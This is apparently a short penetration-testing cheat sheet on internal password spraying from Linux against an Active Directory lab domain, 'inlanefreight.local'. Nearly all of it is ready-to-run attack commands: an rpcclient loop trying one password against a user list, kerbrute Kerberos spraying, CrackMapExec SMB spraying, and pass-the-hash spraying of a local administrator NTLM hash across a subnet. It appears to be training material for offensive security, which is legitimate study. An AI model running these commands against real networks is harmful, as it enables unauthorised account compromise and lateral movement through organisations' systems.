8. Internal Password Spraying - from Linux
rpcclient - Password Spraying
for u in $(cat valid_users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 | grep Authority;
doneKerbrute - Kerberos Password Spraying
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1CrackMapExec (CME) - SMB Password Spraying
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 | grep +
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123Local Administrator Password Reuse
CrackMapExec - Local Admin Spraying
sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +Last updated